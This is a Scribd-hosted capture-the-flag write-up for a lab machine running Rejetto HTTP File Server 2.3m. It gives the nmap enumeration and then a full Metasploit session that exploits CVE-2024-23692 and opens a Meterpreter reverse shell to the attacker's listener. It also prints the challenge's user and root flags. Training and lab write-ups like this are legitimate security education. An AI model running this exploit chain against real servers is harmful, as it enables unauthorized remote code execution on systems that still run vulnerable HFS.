[go: up one dir, main page]
Scribd
Upload
160 views4 pages

Rejetto Writeup

The document is a write-up for the Parrot CTFs machine named Rejetto, detailing its easy difficulty level and the skills required for exploitation. It describes the enumeration process using Nmap to identify open ports and the exploitation of a vulnerability in the Rejetto HTTP File Transfer Server, leading to a successful privilege escalation. The write-up concludes with the retrieval of user and root flags after gaining administrative access.

Uploaded by

rishivhavle21
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
160 views4 pages

Rejetto Writeup

The document is a write-up for the Parrot CTFs machine named Rejetto, detailing its easy difficulty level and the skills required for exploitation. It describes the enumeration process using Nmap to identify open ports and the exploitation of a vulnerability in the Rejetto HTTP File Transfer Server, leading to a successful privilege escalation. The write-up concludes with the retrieval of user and root flags after gaining administrative access.

Uploaded by

rishivhavle21
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

Parrot CTFs Machine Writeup

Machine Details

Lab Machine Name: Rejetto

Date: May 5, 2025

Prepared By: Hitesh Sharma

Challenge Author(s): Hitesh Sharma

Difficulty: Easy

Machine Flags:

User :- PCTF{3eef03a19869445fca567aaf308bf7fc}

Root :- PCTF{a43ca7db63fc55e67aa50e135556e720}

Machine Description

Description: A classic file-sharing service hums along, offering simple access to a few public
resources. It looks stable, even nostalgic, perhaps a relic from another era. But age often brings
oversight. Explore its behavior, peek into its features, and you might just find something that
wasn’t meant to be shared.

Skills Required: Windows CMD , Powershell , Kali Linux , Metasploit

Skilled Learned: Windows Privilege Escalation, Windows Exploitation ,


Metasploit C2

Business Confidential
Enumeration
- Start with nmap Scan to enumerate open port of the target …
o ┌──(kali㉿kali)-[~]
o └─$ nmap -sC -sV -p- 192.168.248.148 --min-rate=1500
o Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-02 11:29 EDT
o Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing
SYN Stealth Scan
o
o Nmap scan report for 192.168.248.148
o Host is up (0.0011s latency).
o Not shown: 65522 closed tcp ports (reset)
o PORT STATE SERVICE VERSION
o 80/tcp open http HttpFileServer httpd 2.3m
o |_http-title: HFS /
o |_http-server-header: HFS 2.3m
o 135/tcp open msrpc Microsoft Windows RPC
o 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
o 445/tcp open microsoft-ds?
o 5040/tcp open unknown
o 7680/tcp open pando-pub?
o 49664/tcp open msrpc Microsoft Windows RPC
o 49665/tcp open msrpc Microsoft Windows RPC
o 49666/tcp open msrpc Microsoft Windows RPC
o 49667/tcp open msrpc Microsoft Windows RPC
o 49668/tcp open msrpc Microsoft Windows RPC
o 49669/tcp open msrpc Microsoft Windows RPC
o 50076/tcp open msrpc Microsoft Windows RPC
o MAC Address: 00:0C:29:CF:DA:D5 (VMware)
o Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
o
o Host script results:
o | smb2-security-mode:
o | 3:1:1:
o |_ Message signing enabled but not required
o | smb2-time:
o | date: 2025-05-02T15:32:11
o |_ start_date: N/A

- We find out that HttpFileServer httpd 2.3m is running on port 80 , which is a Rejetto
HTTP File Transfer Server …..
- Searching on the internet we find out that it is vulnerable to Rejetto HTTP File Server
2.3m - Remote Code Execution (RCE) on exploit-db and has a CVE-2024-23692
o https://www.exploit-db.com/exploits/52102

Business Confidential
Exploitation
- Let’s Start Metasploit and search for exploitation module .

- And then we have to select this module and set the options available for this module .

o msf6 > use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692


o [*] No payload configured, defaulting to
cmd/windows/http/x64/meterpreter/reverse_tcp
o msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set
RHOSTS 192.168.248.148
o RHOSTS => 192.168.248.148
o msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set
RPORT 80
o RPORT => 80
o msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
o [+] 192.168.248.148:80- The target is vulnerable. Rejetto HFS
version 2.4.0 RC7
o msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set
LHOST eth0
o LHOST => eth0
o msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set
LPORT 4444
o LPORT => 4444
o msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) >
exploit
o [*] Started reverse TCP handler on 192.168.248.132:4444
o [*] Running automatic check ("set AutoCheck false" to disable)
o [+] The target is vulnerable. Rejetto HFS version 2.3m
o [*] Sending stage (203846 bytes) to 192.168.248.148
o [*] Meterpreter session 2 opened (192.168.248.132:4444 ->
192.168.248.148:49729) at 2025-05-02 12:27:22 -0400
o
o meterpreter > getuid
o Server username: REJETTO-HTTP-FI\jady
o meterpreter >

- we get the shell as jady , and after checking privileges we find out that we have
administrative privileges , now we can read the user and root flag .

Business Confidential
Business Confidential

You might also like